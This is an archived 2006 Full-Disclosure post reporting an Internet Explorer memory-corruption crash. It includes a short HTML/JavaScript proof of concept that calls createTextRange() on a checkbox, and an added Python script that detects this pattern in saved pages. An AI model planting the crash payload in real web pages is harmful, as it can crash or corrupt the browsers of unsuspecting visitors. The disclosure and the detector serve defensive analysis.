[Full-disclosure] IE crash

Type securityvulns
Reporter Securityvulns
Modified 2006-03-22T00:00:00


I can't find any info on this delicious IE bug, but it seems to be publicly known:

<input type="checkbox" id='c'>
<script>
r=document.getElementById("c");
a=r.createTextRange();
</script>

It will badly access a (virtual?) pointer table, making EIP jump to a random address. This has various effects on the system I've tested with, including crashing. It works on these versions of mshtml.dll:

XP SP2: 6.0.2900.2802 - latest
WS2003: 6.0.3790.0

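A static check for the pattern in the post, added here as an example and not part of the original message: it flags saved pages whose inline script calls createTextRange() on an element the markup declares as a checkbox. The function and sample names are hypothetical and the benign sample is constructed; this is a triage heuristic over markup and inline script text and does not evaluate script.

```python
import re
from html.parser import HTMLParser

class _Collector(HTMLParser):
    """Collect ids of checkbox inputs and the text of inline scripts."""
    def __init__(self):
        super().__init__()
        self.checkbox_ids, self.scripts, self._in_script = set(), [], False

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "input" and a.get("type", "").lower() == "checkbox" and a.get("id"):
            self.checkbox_ids.add(a["id"])
        elif tag == "script":
            self._in_script = True
            self.scripts.append("")

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script:
            self.scripts[-1] += data

_GET = r"document\.getElementById\(\s*['\"]([^'\"]+)['\"]\s*\)"
_CALL = r"\s*\.\s*createTextRange\s*\("
ASSIGN = re.compile(r"([A-Za-z_$][\w$]*)\s*=\s*" + _GET)  # r = document.getElementById("c")
DIRECT = re.compile(_GET + _CALL)  # document.getElementById("c").createTextRange(

def find_checkbox_textrange_calls(html):
    """Return sorted ids of checkbox inputs on which script calls createTextRange()."""
    c = _Collector()
    c.feed(html)
    c.close()
    js = "\n".join(c.scripts)
    hits = {i for i in DIRECT.findall(js) if i in c.checkbox_ids}
    for var, elem_id in ASSIGN.findall(js):
        via_var = re.search(r"(?<![\w$.])" + re.escape(var) + _CALL, js)
        if elem_id in c.checkbox_ids and via_var:
            hits.add(elem_id)
    return sorted(hits)

# Test case quoted in the post, and a constructed benign page (text input).
POST_SAMPLE = """<input type="checkbox" id='c'> <script> r=document.getElementById("c"); a=r.createTextRange(); </script>"""
BENIGN_SAMPLE = """<input type="text" id="q"><input type="checkbox" id="c">
<script>var t=document.getElementById("q"); t.createTextRange();</script>"""

if __name__ == "__main__":
    print(find_checkbox_textrange_calls(POST_SAMPLE))    # ['c']
    print(find_checkbox_textrange_calls(BENIGN_SAMPLE))  # []
```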